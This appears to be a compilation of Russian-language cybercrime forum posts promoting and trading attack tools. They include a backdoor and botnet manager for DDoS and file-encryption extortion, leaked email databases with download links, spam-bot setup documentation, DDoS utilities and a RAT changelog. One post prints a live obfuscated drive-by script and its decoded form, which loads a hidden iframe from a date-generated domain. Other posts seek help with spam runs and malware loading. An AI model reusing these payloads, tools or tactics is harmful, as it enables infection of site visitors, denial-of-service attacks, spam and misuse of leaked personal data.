В этой статье я расскажу о программе DeadCrush. Программа создана для управления бэкдорами на серверах и интересна она своим функционалом. Загрузив бота на сервер нам доступны следующие действия: Исполнением команд на сервере, шифровка и расшифровка файлов с целью вымогательства, получение информации о сервере, загрузка шеллов и самые интересные функции, для чего собственно и создают ботнеты - это спам и Ddos. Также программа имеет сканер дорков и поиск админ панели(во 2 версии будет реализован брутфорс и кейлоггер).
В интернете полно дорков все, что вам нужно это найти подходящую уязвимость. Сайты куда выгодней заражать ведь их канал связи во много раз больше, чем у компьютера, следовательно и атака будет намного мощней. Имея 5-8 зараженных сайтов, slowloris атакой можно надолго выводить крупные сервера. Причем программа имеет два специальных инструмента для атак на конкретные сервера с уязвимостями refref и apachekiller . Для такого же эффекта вам понадобятся от 10-18 компьютеров.
В качестве доказательства могу привести toolkit itsoknoproblembro. О котором можно прочитать здесь [тыц](https://security.radware.com/ddos-knowledge- center/ddospedia/itsoknoproblembro/). Из аналогов есть программа UFONet, но она менее специализированна.
Теперь рассмотрим саму программу. Все нужные вам библиотеки она установит сама. Для работы нужен python 2.7.
Вводим адрес зараженного сервера, чтобы работать с одним из серверов нужно
ввести его номер, теперь выводим информацию о нем:
кли-
кай
Теперь выбираем DDOS и вводим ip адрес жертвы, время атаки, и тип
запроса(POST/GET):
кли-
кай Думаю как
дальше пользоваться программой будет понятно, также советую почитать о
itsoknoproblembro.
Ссылка:тыц
© copyright
База мыл с сайта exboyfriendjewelry.com
Spoiler: 30
Всем доброго времени суток. что такое install(load). Дайте какую нибудь литературу ,где описано об этом. сам не мог наити.
База мыл форума какого-то французского телеканала.
Больше 21к мыл.
Может кому пригодится.
Spoiler: 10
https://mega.nz/#!DM4GBKha!g1JEt3YG5PINB_ERErFCiHuGFT4ZIHp8_yRWXw6C500
GeoIP до (2.04.2014)
Spoiler: 5
LINK = https://www.sendspace.com/file/yalhas
PSWD = dlab
Оригинальный pack.tar.gz качать с офф сайта
Мне нужен помощь!
Срочно понадобилось организовать СМС массовую рассылку на 1млн номеров по
всему миру. Подскажите пожалуйста, какой либо рабочий софт для отправки смс
сообщений по базе клиентов. можно массовые рассылки через facebook? а как?
софт для этого сушествует?
Заранее спасибо.
Всем привет друзья!
Есть абузоустойчивый впс с хорошими характеристиками, подскажите пожалуйста
неплохой актуальный набор скриптов для спама из тех что в паблике пожалуйста.
Спасибо.
Всем привет.
Народ, я кодер и решил занятся подменой выдачи, но в этом я полный ноль. Хотел бы советов у людей. Мне свою партнерку писать не особо хочется, взять хочу уже существующие для начала.
Меня интересует, от чего зависит профит ?
На какие подводные камни можно напаротся ?
Хотелось бы пообщатся в жабе, именно с теми кто работал или что то дельное может посоветовать.
жаба: phelp17@creep.im
Добрый день. Помогите разобраться в организации слива трафа на связку с
шеллов.
Как правило партнер дает так называемый "поток на связке". Мне сказали там
меняется домен каждые 5 минут. Для забора ссылки нужен спец. скрипт.
Вообщем я так понял, надо делать себе отдельную тдс, и на неё лить трафик с
шеллов. А на самой тдс, ставить скрипт который, забирает ссылку с потока.
Как сейчас происходит слив трафа с шеллов? Как раньше - обычный
С нормальным саппортом, что бы не морозился. И за адекватные деньги.
нужно сделать баннер с ифреймом, нужно шаблон какой то что бы я мог сам менять картингки и вставлять линки. Как шировать яс я примерно знаю. Нужно именно создание и внедрение ссылки, настроеный проект. Кто может помочь?
Погонял гугл, яшу, в 2012 выкладывали панель и вроде какой то билдер/бинарник, но все ссылки битые или на аплоадерах файлы удалены. Если у кого то завалялось это добро, поделитесь,....
В чем отличия определений трафик, лоады, инсталлы, загрузки?
**1).Приветствую, есть спам-система который шлет через шелы, хочу вместо шелов попробовать использовать VPS ки через прокси, подскажите пожалуйста кто в теме, как можно прикрутить прокси на выход VPS (Linux-CPanel), прокси через SSH tuneling (Socks 5) имеется ввиду , тоесть как (чем) беконектить на локалку сервера и как весь траф пустить по этому тунелю? возможно есть какие то подробные маны по теме но я к сожалению не смог нарыть не чего путного...
2).Также по теме какие есть актуальные SMTP релеи (серверы) под винду? которые реально работают и сообщения на внешние майлы доставлют ,хотябы на папку спам?
Можно и в ПМ..**
Интересует какие типы файлы и на какие торрент-трекерах лучше заливать чтобы получить максимальное количество скачиваний...
Наткнулся на интересный пост на хабре, который поможет повысить пробив или вернее загрузки, написал сие на другом форуме решил перепостить сюда думаю вы оцените
Spoiler: 25
Хабра пост, вся фишка в том что после инициализации скрипта окно закрыть не выйдет, прогрузить exe можно будет полностью. Автор пишет что работает в IE, Chrome, FF, Safari об о Opera не упоминает.
Лично у меня теперь разница между пробивом и статсой на партнерке 9-10%.
Всем Счастья посоны!
У меня ~3 млн активные емаилы. Хочу делать спам. У меня есть скрипт, но не
знаю как толком им пользываться, и вопше если ето безопасно. Также я читал что
ботнетом легко делать спам, но у меня его нету. Есть ли у кого нибуть бот
который:
1. взял емаил из емаил.тхт
2. взял прокси ис прокси.тхт
3. отправил сообшение ис пм.тхт
4. повторить пока не закончяться все емаилы.
Также буду благодарен если предложыте другие рабочие медоты.
Оставлю это здесь, т.к. проблема насущная.
Чтобы спарсить нашу выдачу есть следующие варианты:
Диапазоны ip-адресов в гугле не лежат, увы, поэтому список пришлось составлять самому:
173.194.32.[0-127]
173.194.33.[0-63]
173.194.34.[0-255]
173.194.35.[0-191]
173.194.71.[152-167]
173.194.71.[17-19]
74.125.232.[0-255]Click to expand...
Это не всё, а лишь то что насканил я. В штучном исчислении >650ip, на каждом
из которых висит главная гугла. Надеюсь этого достаточно, чтобы успеть
спарсить до бана все что угодно)
Собственно, соседние сети тоже числятся за ним, и на них тоже можно найти
морды google.com.
согласно [https://blog.mozilla.org/security/2013/01/1...-vulnerability/](https://blog.mozilla.org/security/2013/01/11/protecting- users-against-java-vulnerability/)
To protect Firefox users we have enabled Click To Play for recent versions of Java on all platforms (Java 7u9, 7u10, 6u37, 6u38). Firefox users with older versions of Java are already protected by existing plugin blocking or Click To Play defenses.
Click to expand...
Но у меня, обновившись только что до последнего стейбл-релиза (18й), Java по- прежнему доступна без клика, сразу.
У кого фокс уже просит клика по яве?
А теперь мысли:
- Может прерывать вызов ява-плагина после всех попыток определить содержимое, непосредственно в момент его вызова.
На самом деле, именно в фф порядок определения такой: type > расширение >
content-type.
Мне не известно, какие mime-типы были включены в список заблокированных.
Мы имеем на выбор
- application/java-archive
- application/x-java-archive
- application/x-java-pack200
- application/x-java-jnlp-file
Расширения файлов, которые так же числятся за ява-плагином:
- jar
- war
- class (не самый удобный вариант)
- jnlp
Возможно, что фокс определяет необходимость блокирования явы, на основе типа содержимого, и тогда есть шанс, что не все типы были включены в черный список.
Вопросы следующие:
- как обновиться до версии, в которой ява запускается по клику.
- кто проверит разные типы и способы включения явы на страницу?) (сам
проверю, если скажете как обновиться)
Вот недавно в поисках новых сэмплов в трэкерах наткнулся на сабж.
Снял тут (сам скрипт ведет к BlackHole):
Spoiler: 5
Code:Copy to clipboard
h**p://www.stefanianicolosi.com
Spoiler: 5
Code:Copy to clipboard
<script>try{1-prototype;}catch(evsd){q=152;}
if(020==0x10){f=[93,107,99,90,106,94,102,100,21,101,91,109,107,72,86,101,90,100,100,68,106,100,88,90,105,30,30,114,3,-1,23,22,21,23,108,86,105,22,93,96,22,50,23,106,93,96,105,35,106,91,90,91,22,36,23,106,93,96,105,35,72,49,2,1,22,21,23,22,107,88,104,21,99,101,21,52,22,105,95,95,104,37,105,90,92,90,21,28,22,105,95,95,104,37,71,48,4,0,21,23,22,21,109,87,103,23,106,90,106,106,21,52,22,105,95,95,104,37,55,21,33,22,97,102,22,34,23,106,93,96,105,35,73,22,31,23,94,94,50,3,-1,23,22,21,23,95,91,31,106,90,106,106,21,53,22,37,32,113,2,1,22,21,23,22,21,23,22,21,107,94,94,106,36,104,92,91,89,23,51,21,107,91,104,107,49,2,1,22,21,23,22,114,23,91,97,106,91,21,114,3,-1,23,22,21,23,22,21,23,22,105,95,95,104,37,105,90,92,90,21,52,22,105,92,105,105,23,33,21,107,94,94,106,36,66,50,3,-1,23,22,21,23,115,2,1,22,21,23,22,103,92,106,106,105,100,21,31,106,93,96,105,35,106,91,90,91,22,31,23,106,93,96,105,35,102,100,90,70,108,90,105,67,30,50,3,-1,116,3,-1,4,0,91,108,100,88,107,95,100,101,22,71,88,100,89,102,99,67,108,99,87,92,104,60,92,100,90,105,87,105,102,104,29,108,100,94,111,31,112,4,0,21,23,22,21,109,87,103,23,90,21,52,22,99,92,109,21,59,87,105,92,30,106,101,95,109,33,39,37,39,38,30,50,3,-1,23,22,21,23,108,86,105,22,104,23,51,21,68,87,105,95,36,88,92,95,97,31,90,35,94,91,105,63,101,106,105,105,29,32,37,40,32,49,2,1,22,21,23,22,105,95,95,104,37,105,90,92,90,21,52,22,39,42,42,42,45,45,45,48,38,38,23,33,21,31,90,35,94,91,105,68,101,99,107,94,29,32,22,31,23,38,109,61,60,59,61,60,59,32,22,32,23,30,89,37,93,90,107,58,86,107,91,29,32,22,31,23,38,109,61,60,59,61,31,32,23,30,66,88,106,93,37,104,100,108,100,89,31,105,21,33,22,37,111,60,59,61,31,30,50,3,-1,23,22,21,23,106,93,96,105,35,56,22,50,23,42,45,41,45,38,50,3,-1,23,22,21,23,106,93,96,105,35,68,22,50,23,40,38,43,45,41,47,41,43,43,45,48,4,0,21,23,22,21,107,94,94,106,36,70,23,51,21,107,94,94,106,36,66,23,37,21,107,94,94,106,36,54,50,3,-1,23,22,21,23,106,93,96,105,35,73,22,50,23,106,93,96,105,35,68,22,26,23,106,93,96,105,35,56,49,2,1,22,21,23,22,105,95,95,104,37,101,99,92,69,107,92,104,66,23,51,21,40,36,37,23,37,21,107,94,94,106,36,66,50,3,-1,23,22,21,23,106,93,96,105,35,101,91,109,107,22,50,23,100,90,111,106,71,88,100,89,102,99,67,108,99,87,92,104,48,4,0,21,23,22,21,105,91,105,108,104,99,23,106,93,96,105,48,4,0,114,4,0,2,1,92,106,101,89,105,96,101,99,23,89,103,92,87,105,92,72,86,101,90,100,100,68,106,100,88,90,105,30,103,35,22,66,96,100,33,23,67,86,111,31,112,4,0,21,23,22,21,105,91,105,108,104,99,23,67,86,107,94,35,105,101,106,101,90,29,31,67,86,111,35,66,96,100,30,23,32,21,105,36,99,92,110,105,31,31,21,34,22,66,96,100,30,50,3,-1,116,3,-1,4,0,91,108,100,88,107,95,100,101,22,92,92,100,90,105,87,105,92,70,104,92,107,89,102,72,86,101,90,100,100,73,105,105,95,99,94,30,106,101,95,109,35,22,97,92,100,92,107,94,33,23,112,100,101,91,30,114,3,-1,23,22,21,23,108,86,105,22,103,88,100,89,23,51,21,101,91,108,23,72,86,101,90,100,100,68,106,100,88,90,105,61,90,101,91,103,88,106,100,105,30,106,101,95,109,32,49,2,1,22,21,23,22,107,88,104,21,99,91,105,107,91,103,106,22,50,23,24,87,108,87,109,102,103,90,105,95,102,110,97,92,93,97,89,112,91,99,113,101,104,106,103,97,111,92,102,88,111,107,103,104,23,37,105,101,99,95,105,31,29,28,32,49,2,1,22,21,23,22,107,88,104,21,106,106,103,23,51,21,30,29,48,4,0,-2,93,101,103,31,108,86,105,22,94,23,51,21,39,49,21,96,22,49,23,98,90,101,93,105,95,49,21,96,22,32,34,22,30,114,3,-1,23,22,21,23,22,21,23,22,104,107,104,21,34,51,21,99,91,105,107,91,103,106,81,88,105,91,86,107,91,71,88,100,89,102,99,67,108,99,87,92,104,29,105,87,99,91,34,21,39,34,21,99,91,105,107,91,103,106,36,97,92,100,92,107,94,21,36,22,38,32,83,48,4,0,21,23,22,21,116,3,-1,23,22,21,23,104,90,107,107,103,101,22,104,107,104,21,34,22,28,37,29,21,34,22,111,102,100,90,50,3,-1,116,3,-1,4,0,104,92,106,62,101,106,90,105,108,86,99,30,91,108,100,88,107,95,100,101,30,30,114,3,-1,23,22,21,23,106,103,112,113,2,1,22,21,23,22,21,23,22,21,96,92,29,107,111,101,92,101,91,23,95,91,105,87,98,92,77,86,106,57,103,92,87,105,92,90,21,52,51,21,25,107,99,91,91,91,96,100,90,91,24,30,114,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,109,87,103,23,107,99,96,110,21,52,22,66,88,106,93,37,104,100,108,100,89,31,33,99,92,109,21,59,87,105,92,30,30,38,39,37,39,38,30,50,22,21,23,22,21,23,22,21,23,22,21,23,22,107,88,104,21,91,101,98,88,95,99,69,87,98,92,22,50,23,93,90,101,91,103,88,106,90,71,105,90,108,90,100,73,87,99,91,101,98,74,106,103,96,100,92,31,107,99,96,110,33,23,39,43,35,22,28,105,107,28,32,49,21,23,22,21,23,22,21,23,22,21,23,22,94,93,104,98,23,51,21,91,101,88,108,99,90,101,106,35,90,104,90,88,106,90,60,98,90,100,91,99,107,30,23,64,60,71,56,67,58,25,31,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,96,92,103,100,36,104,92,106,54,107,106,103,96,88,106,107,91,29,25,105,103,90,24,33,23,24,93,107,106,101,49,37,36,25,33,89,102,99,86,96,100,67,88,99,90,34,24,36,96,100,35,90,93,94,54,39,42,25,31,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,96,92,103,100,36,104,107,111,97,92,36,108,96,90,105,95,22,50,23,24,37,103,110,23,50,22,2,1,22,21,23,22,21,23,22,21,23,22,21,23,95,91,105,99,35,106,106,110,99,91,35,95,91,94,94,94,105,23,51,21,25,38,101,111,24,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,96,92,103,100,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,23,51,21,25,94,94,91,90,90,101,24,48,23,3,-1,23,22,21,23,22,21,23,22,21,23,22,21,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,-1,-2,0,95,91,105,87,98,92,77,86,106,57,103,92,87,105,92,90,21,52,22,105,105,107,90,50,3,-1,23,22,21,23,22,21,23,22,114,4,0,21,23,22,21,116,89,86,107,89,93,31,91,30,114,95,91,105,87,98,92,77,86,106,57,103,92,87,105,92,90,21,52,22,106,101,90,90,93,95,99,92,90,48,116,3,-1,116,34,21,40,38,37,32,49];}if(window.document)e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i+1769!=0;i+=1){j=i;s=s+r((w[j]*1+(9+e("j"+"%"+"3"))));}
if(q&&f&&012===10)e(s);</script>
Расшифровывается в хроме оч. просто, заменой:
Spoiler: 5
Code:Copy to clipboard
e(s); на console.log(s);
В итоге если, привести все в удобоваримый вид, получаем:
Spoiler: 5
Code:Copy to clipboard
function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = Math.ceil(d.getHours()/3);
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
var str = '';
for(var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setInterval(function(){
try{
if(typeof iframeWasCreated == "undefined"){
var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://"+domainName+"/in.cgi?15");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
iframeWasCreated = true;
}
}catch(e){iframeWasCreated = undefined;}
}, 100);
Этот скрипт интересен тем, что он перенаправляет на домен, который
генерируется в зависимости от текущей даты (длина 16 символом, дом. зона ru,
льют на SutraTDS).
P.S. Хотелось бы услышать ваши мнения об эффективности/палевности данного
метода.
Есть 4-5 млионов мыл с приобладанием в 50-70% юсы и канады.
Знаю что EVA фармаси к трафику со спама относиться нормально.
Но там нужен поручитель....Возможно кто нить придложит свою помошь за 50% от
прибыли?
Зашел в пятницу на хостинг одного знакомого а там зоопарк крутится. Вообщем выцепил что успел. м.б. кому-то пригодится.
Осмотрел беглым взглядом. В комплекте замечен ddos-бот, сканер уязвимостей, шелл и т.д.
В общем есть сервера. Пользователя виден тока сервер с ngnix он соответственно
проксирует на ДРУГОЙ сервер на котором установлен Apache. Который внешне не
виден.
Так вот вопрос. В данный момент происходит непонятная ддос атака при этом
ngnix не сильно нагружен а вот Apache падают под нагрузкой.
Есть идеи как такое возможно? И что за тип ддоса?
Небольшая стата по версиям некоторых плагинов в трафе (силверлайт,шоквейв,мплеер,квиктайм)
Spoiler: 30
MediaPlayer
Version: Count:
10.0.0.3646 1
10.0.0.3802 3
10.0.0.3990 1
10.0.0.3997 2
10.0.0.4008 2
10.0.0.4040 1
10.0.0.4051 2
10.0.0.4058 4
10.0.0.4074 7
10.0.0.4081 20
11.0.5358.4826 1
11.0.5358.4827 2
11.0.5705.5043 1
11.0.5721.5145 19
11.0.5721.5212 1
11.0.5721.5230 3
11.0.5721.5237 1
11.0.5721.5246 1
11.0.5721.5260 5
11.0.5721.5262 4
11.0.5721.5268 55
11.0.5721.5280 213
11.0.6000.6324 4
11.0.6000.6336 1
11.0.6000.6349 1
11.0.6000.6352 8
11.0.6000.6353 22
11.0.6000.6512 1
11.0.6001.7000 14
11.0.6001.7004 1
11.0.6001.7007 12
11.0.6001.7008 15
11.0.6001.7010 50
11.0.6001.7118 5
11.0.6002.18005 3
11.0.6002.18065 4
11.0.6002.18111 27
11.0.6002.18311 337
12.0.7100.0 1
12.0.7600.16385 61
12.0.7600.16415 105
12.0.7600.16667 711
12.0.7600.20576 2
12.0.7600.20792 11
12.0.7601.16562 2
7.10.0.3059 1
9.0.0.3250 8
9.0.0.3354 1
9.0.0.3364 2
9.0.0.3367 14
9.0.0.4503 15
9.0.0.4507 3
9.0.0.4508 10
9.0.0.4510 47
null 1803
QuickTime
Version: Count:
5.0.1.0 1
5.0.2.0 1
6.0.0.0 1
6.0.2.0 1
6.1.0.0 2
6.3.0.0 2
6.4.0.0 3
6.5.0.0 17
6.5.1.0 27
6.5.2.0 2
7.0.2.0 1
7.0.3.0 5
7.0.4.0 11
7.1.0.0 9
7.1.3.0 14
7.1.5.0 9
7.1.6.0 9
7.2.0.0 13
7.3.0.0 8
7.3.1.0 7
7.4.0.0 4
7.4.1.0 8
7.4.5.0 9
7.5.0.0 19
7.5.5.0 54
7.6.0.0 61
7.6.2.0 71
7.6.4.0 72
7.6.5.0 165
7.6.6.0 417
7.6.7.0 198
7.6.8.0 760
null 1670
SilverLight
Version: Count:
1.0.30109.0 1
1.0.30401.0 1
1.0.30716.0 3
2.0.30401.0 2
2.0.30523.8 1
2.0.31005.0 9
2.0.40115.0 7
3.0.40624.0 59
3.0.40723.0 2
3.0.40818.0 42
3.0.50106.0 68
3.0.50611.0 11
4.0.41108.0 1
4.0.50401.0 40
4.0.50524.0 136
4.0.50826.0 47
4.0.50917.0 1627
null 1594
ShockWave
Version: Count:
10.0.0.0 1
10.0.1.0 2
10.1.0.0 4
10.1.0.11 2
10.1.1.16 1
10.1.3.0 1
10.1.3.18 3
10.1.4.0 4
10.1.4.20 3
10.2.0.0 34
10.2.0.22 17
10.2.0.23 7
10.3.0.0 4
10.3.0.24 3
10.4.0.0 2
10.4.1.0 2
11.0.0.0 21
11.0.0.429 15
11.0.0.458 8
11.0.0.465 33
11.0.3.470 4
11.0.3.471 14
11.0.3.472 11
11.5.0.0 118
11.5.0.595 26
11.5.0.596 10
11.5.0.600 10
11.5.1.601 45
11.5.2.602 23
11.5.6.606 95
11.5.7.609 99
11.5.8.612 169
8.0.0.0 2
8.5.0.0 3
8.5.1.0 5
8.5.1.102 4
null 2846
На одной из многочисленных варезных помоек нашел хрумер. Исходя из описания в
архиве 3, 4 и 5 версии и присутствует кряк. Пока что еще не даже не запускал.
Позже проверю на работоспособность.
Предупреждаю что качайте и запускайте на свой страх и риск!!!
Чистоту и работоспособность софта не гарантирую!
Перечитывал свои новости пришедшие по RSS и наткнулся на забавный сервис.
Как выяснилось, фишеры отдают предпочтение услугам tinyurl.com (41,3% ссылок на страницы-ловушки), bit.ly (15,29%) и r2me.com (12,04%). Для маскировки адресов зараженных страниц чаще прочих используются URL, сгенерированные k.im (27,87% от общего количества), notlong.com (27,05%) и tinyurl.com (18,85%).
По наблюдениям экспертов, потоки спама с короткими URL неуклонно растут. Некоторые из крупных служб уже начали фильтровать все короткие URL с помощью специальных веб-сервисов.
Click to expand...
Допустим есть связка и линк для трафика вида хттп://site.cn/papka/file.php?=adfaujszbvljsbdvlasvuladguasdjgnaianvnbvjadv
И есть сервис tinyurl.com
Вбиваем урл на сервис и получаем: h__p://tinyurl.com/2usy5sw
Данный урл и короче при криптовании, что значит уменьшение криптованного
iframe кода и свой домен не так палится в глазах админов.
Ну или там спам рассылать через этот урл.
Но есть один вопрос. Как отнесется сам сервис к большому потоку запросов?
p.s. Понимаю что это по-большому счету фигня и минусов больше чем плюсов, но вот мысль почему-то не покидает меня, этот сервис можно еще более полезно юзать. Вот только как? Может вы предложите свои варианты?
Еще в прошлом году написал от нех делать спам бота. Бот довольно простой, хреново пашет, в систему ставится по ламерски, но главное отличие его от всех других - размер 5632 байт. Большую ценность он представляет только тем кто пишет на ASMe. Былобы очень хорошо стабильной работы добавить работу с SEH, но както влом
В архиве находится сама админка бота, исходники бота FASM и исходники билдера
Delphi
Вот краткое описание бота:
© SLESH 2008
РАЗМЕР бОТА в чистом виде - 5632 байта при использовании билдера.
Без билдера можно уменьшить еще на 512 байт
Тут вы сможите прочитать:
0) Возможности бота
файл: const.inc
server_script db /msb/task.php?
,0,0,0,0,0,0,0,0 - путь к админке
server_host db localhost
,0,0,0,0,0,0,0,0,0,0,0,0,0 - host админки
my_sys_name db \proga.exe
,0,0,0,0,0,0,0,0,0,0 ; \ обязателен!!!- имя с
которым будет прога сидеть в системе
MemFileName db test123
,0 - юзается для того чтобы предотвратить повторный
запуск
--------------------
Настройка админки:
файл config.php
$db_host=localhost
; - хост с бд
$db_port=3306; - порт бд
$db_user=root
; - юзер бд
$db_pass=pass
; - пасс от бд
$db_name=sbot
; - имя базы в бд (нужно создать самому)
$admin_name=slesh
; - имя пользователя для доступа к админке
$admin_pass=123
; - пароль для доступа к админке
$TIME_LIM=00:01:00
; -(часы:минуты:секунды) если время последнего отстука
больше данного, то бот считается что ушел в офлайн
$max_thread=1; - кол-во поток для спама. 5 норм
$block=on
; - блокировать дохлых ботов или нет. (настраивается из админки)
----------------------
Установка бота
1. Залить все скрипты и на все скрипты и папки поставить права 666
2. Войти в админку (index.php) и выбрать пункт меню - INSTALL
3. настроить бота на получение заданий. Файл раздачи заданий - task.php
----------------------
Настройка бота через билдер:
1. Host - хост с админкой типа site.com
2. Path - путь к скрипту раздачи заданий типа /folder/task.php?
3. SYSNAME - имя с которым бот установится в систему
4. TIME - время в секундах между отстуками бота на админку
----------------------
--------РАБОТА С АДМИНКОЙ----------
ВКЛАДКИ:
1. BOT
Показывает кол-во онлайн ботов, общее кол-во ботов и ботов которые незабанины
админкой
Админка банит ботов в том случае если бот несмог удачно отослать ни одного
письма из задания.
По этой причине лучше всего отрубить бан ботов.
Ссылки:
Очистить базу ботов - полностью удаляет всю инфу о ботах
Очистить базу плохих ботов - выводит всех ботов из бана
Запретить блокировку ботов/Разрешить блокировку ботов - банить ботов или нет
2. NEW TASK
Создание нового задания для спама.
Параметры:
- TASK NAME - название задания
- FROM NAME - имя откого будет слаться письмо
- MAILS Per BOT MIN - минимальное кол-во почтовых ящиков которое может быть
выдано боту
- MAILS Per BOT MAX - минимальное кол-во почтовых ящиков которое может быть
выдано боту
- MAILS LIST - почтовая база для расслыки
- FROM EMAIL - почтовые ящики с которых якобы отослали письмо. Заполнять
через ENTER
- Subjects(%SUBJECT) - возможные темы письма.заполняются через ENTER %SUBJECT
3. TASKS
Отображает существующие задания
Значение полей:
ID - просто номер
NAME - имя задания
FromName - от чьего имени шлется
FromMail - от каких адресов
Header - заголовки письма
Body - Текст письма. ПРи нажатии на Edit - появляется окно редектирования
текста пьма.
List - база мыл
Send - кол-во мыл розданных ботам в процентах
Bad - кол-во неудачных посылок в процентах. Если кликнуть на нем то можно
увидеть полную статистику ошибок с их описанием
Good - кол-во удачных посылок в процентах
Total - кол-во мыл для посылки
Delete - удаление задания
Work - возможность временно поставить задание на паузу.
Del - можно поставить галочку и потом удалить группу заданий
Status - результат выполнения задания. FINISH - это когда все мыла были
отправлены ботам.
Кнопка DeleteGroup - групповое удаление заданий. помеченных галочкой.
4. EMAIL
Отображает существующие спам базы + возможность добавления новых.
Загрузка базы:
а) Если база не очень большая то в поле вписывается её имя, выбирается файл и
нажимается кнопка "закачать"
б) Если база большая то через фтп можно залить её в папку email, в поставить
галочку "Уже загружена" и вписать имя файла
Отображение баз:
ID - просто номер
NAME - название
COUNT - кол-во мыл в базе
ACTION - возможность удаления базы
5. HEADER
Отображение и добавление новых заголовков письма
NAME - имя заголовка
EDIT - открытие окна редактирования
DELETE - удаление заголовка
TEST - проверка макросов встроенных в заголовок и обрабатываемых на стороне
админки
Добавление заголовков:
- Ввести имя заголовка и нажать кнопку NEW
- Вписать текст заголовка и сохранить
6. MACROS
Оботражение или создание макросов обрабатываемых на стороне админки.
Макросы - это небольшие подстановки которые динамически заполняются при отдача
боту пьсьма
MACROS LIST - список юзерских (добавленных) макросов
NAME - имя макроса
TYPE - тип макроса - статический или динамический
COUNT - кол-во вариантов которые выдает макрос (если он статический)
DELETE - удалить макрос
RELOAD - пока недописано.
Создание нового макроса
- Ввести имя макроса
- выбрать тип
- ввести варианты заполния и нажать на кнопку ADD
Если макрос статический STATIC - то просто из списка рандомом выбираются
строки и вставлются на место макроса
Если макрос динамический, то аналогично предыдущему, но каждая строка
проверяется на содержание в себе других макросов
Существующие встроенные макросы на стороне адмики. А именно:
%RND_NUMBER - вставляет цифру в диапазоне он 0 до N или от M до N. Пример:
%RND_NUMBER[7-10] от 7 до 10 или %RND_NUMBER[7] от 0 до 7
%RND_DIGIT - вставляет блок цифр. Пример: %RND_DIGIT[7-10] от 7 до 10 цифр или
%RND_DIGIT[7] от 0 до 7 цифр
%RND_UC_CHAR - аналогично с символами
%RND_LC_CHAR - аналогично с симолами но более расширено
%RND_NUM_CHAR - аналогично но со строкой символов
%FORMAT_DATE - текущая дата
%ADV_LINK - ссылка
%SUBJECT - тема письма
%FROM_NAME - от чего имени шлется
%MESSAGE_BODY - вставляет текст письма. Его присутствие
обязательно!!!!!!!!!!!!!!!
P.S. Существуют макросы на стороне бота. Позже опищу
За макросный модуль - спасибо неизвестному человеку!!!!!!!
P.P.S. Все остальны слова в формате - %STRING - процент и больше англ буквы -
заменятся на $STRING
это сделано чтобы обработка макросов продолжелась со стороны бота
7. INSTALL
Создает нужные для работы таблицы в БД
--------МАКРОСЫ НА СТОРОНЕ БОТА-------------
$BOUNDARY - в каждом письме генерится заново. заменяется на строку формата
--=NextPart%03X_%04X_%08X.%08X
$MESSID - %04X_%08X_%08X.%08X%s
$DATA - ddd, d MMM yyyy hh:mm:ss +0300
$TO_EMAIL - мыло которому шлется данное письмо
$FROM_EMAIL - мыло от которого шлется данное письмо
$REALIP - внешний IP бота
$REALHOST - DNS имя компа с ботом
P.S. В теле или заголовке письма можно применять данные макросы. но с символом
% а не $
-----------------------------------------------------------------------------
ПРимер письма с использованием макросов
а тут у нас подряд идут цифры какогонить ID %RND_NUMBER[7-10]
Пример некоторых заголовком в комплекте.
-----------------------------------------------------------------------------
Информация по принципу работы бота
но и всё.
Download:
http://www.megaupload.com/?d=7C8NPWGA
del
Решил поставить небольшой ботнет на шеллах.
Выбрал Smerch v0.2
Подскажите:
ОЧЕНЬ НАДО, помогите! :help: :help: :help: :cry2: :cry2: :cry2: :bang:
Заранее благодарен!
Привет всем,
такая ситуация: есть самодельный трой, хочу его прогрузить по нескольким
странам. Проблема в том, что нету никакого опыта с
трафиком/сплоитами/лоадерами и т.д. Обращался к некоторым сервисам загрузок,
но они отказываются его грузить, так как у них максимальный размер ехе +-
400кб, у меня он ~750кб(максимльно сжатый УПХом). Отсюда несколько вопросов:
Кто-то сегодня интересовался.
Spoiler: 30
Скачать|Download
Пасс xss.is/
Все файлы открыты. Смотреть и править можно сколь душе угодно.
Собрал вроде все что было по нему.
Есть еще в коллекции шеловый ддос бот от Одинокого Волка.
Но вылаживать пока не буду, авторство мне не принадлежит, да и не хочется
такой продукт по рукам пускать. Там все более продвинуть и удобно.
В догонку и по-теме:
есть еще замечательная утилита sprut.
Юзается на win-дедиках для доса серваков. Выполняет одну полезную функцию -
открывает сокеты на соединение. Если сервак криво настроен - с одного дедика
можно вырубить хостера легко и на долго.
Spoiler: 50
Скачать|Download
пасс xss.is/
какие есть движки ботов на подобие bo2k с открытыми исходниками и где их достать? А так же интересует эффективность и целесообразность написания движка для бота(стоит ли парится)?
NanoCast 0.2 BETA
-- > Builder
--> R.A.T
-- >BotNet
(Skins are avaible just for Vista and Seven)
FIX :
- Fun : Bug MsgBox => Multi MessageBox
- HTTP Attack : Website Checking
- HTTP Attack : Cancel ButtonNEW :
- Control :
- File Create
- File Manager
- Windows Manager
- Register Manager
- Download & Execute ALL- Stealer :
- FileZilla- Fun :
- Chat- Builder :
- Fake MessageBox Options- Other :
